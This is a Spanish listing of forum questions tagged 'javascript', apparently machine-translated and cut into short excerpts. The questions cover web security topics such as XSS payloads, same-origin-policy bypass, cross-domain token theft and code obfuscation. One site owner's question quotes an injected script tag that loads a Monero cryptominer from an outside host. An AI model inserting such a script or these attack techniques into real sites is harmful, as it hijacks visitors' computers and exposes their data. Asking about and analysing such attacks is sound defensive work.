Preguntas con etiqueta 'javascript'

preguntas con etiqueta
1
respuesta

Cuando una extensión de navegador o un script de usuario extrae un archivo JS de la CDN de Google, ¿cómo compromete esto la privacidad del usuario en términos de alcance de Google? [duplicar]

El contexto en el que surgió mi pregunta es esta secuencia de comandos del usuario que elimina localmente los anuncios de Ixquick.com , que es un motor de búsqueda anónimo de" proxy "que proporciona los resultados del índice de Google sin d...
hecha 12.07.2013 - 20:43
1
respuesta

¿Es posible obtener una fuente flash después de una redirección o un elemento dentro de una etiqueta de incrustación / objeto / iframe (dominio cruzado)?

La URL example.com/auth redirigirá automáticamente al usuario (HTTP 302) a example.com/signed_in.SWF ? token = SENSITIVE. ¿Es posible que un atacante robe el token, usando javascript o flash, en el siguiente ejemplo? ¿Cómo? <!DOCTYPE htm...
hecha 28.08.2015 - 22:57
1
respuesta

Javascript inyectado en mi documento HTML

Recientemente me di cuenta de que seguí JavaScript en varias de mis páginas (generalmente antes de cerrar la etiqueta del cuerpo): <script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cr...
hecha 08.06.2018 - 12:13
3
respuestas

Impedir que los usuarios descarguen Javascript, imágenes

Muchas veces veo que el recurso XXXXX.gif o XXXXX.js no se puede guardar cuando intento guardar una página web en Firefox. Esto me hizo pensar, ¿puedo implementar algo similar para mi sitio web también? Básicamente, me intere...
hecha 05.05.2012 - 12:11
2
respuestas

Ocultando (ofuscando) el script de Java [cerrado]

Escuché que ofuscar el java script es inútil y una pérdida de tiempo porque cualquiera con un poco de habilidad puede decodificar tu código. Así que quiero probar eso. Este código mostrará un cuadro de alerta que dice "hey" si lo ejecutas. Pero...
hecha 30.06.2015 - 13:17
3
respuestas

¿Por qué no se puede omitir el SOP utilizando el atributo "src" en la etiqueta de script?

No estoy familiarizado con Javascript, pero quiero saber qué es lo que no se puede hacer en estos pasos para omitir el SOP y extraer datos confidenciales: establece la etiqueta <script src="https://facebook.com/messages"></script...
hecha 29.03.2018 - 19:18
2
respuestas

Vulnerabilidad de divulgación del código fuente

Estoy un poco confundido acerca de la discusión aquí sobre cómo ocultar el código fuente de javascript. Digamos si me dirijo a una url como esta: enlace y luego lo que veo es algo como esto: /* SomeProgram v1.1 <http://www.somewhere.c...
hecha 06.03.2015 - 15:05
1
respuesta

¿Hay algún beneficio de seguridad al eliminar solo las etiquetas 'script' que contienen código?

En la red corporativa de un cliente, algo está eliminando todos los elementos <script> que contienen código, es decir, cosas como <script type="text/javascript">do_something();</script> simplemente se eliminarán d...
hecha 20.03.2015 - 18:16
4
respuestas

Carga útil XSS menor de 20 caracteres

Para un proyecto universitario, debo realizar un análisis en una aplicación web para descubrir las vulnerabilidades de XSS. Después de esto, tengo que informar y crear una prueba automática para probar las vulnerabilidades que he descubierto....
hecha 09.12.2018 - 19:04
4
respuestas

¿Usar XSS basado en DOM para redirigir a un dominio diferente o ejecutar un script?

Estaba probando mis manos en XSS basado en DOM. Me encontré con un escenario donde una cadena controlada por el usuario de la URL se incluye en JavaScript como se muestra a continuación. var userControlled=substring of URL; window.location="/a...
hecha 21.11.2011 - 11:45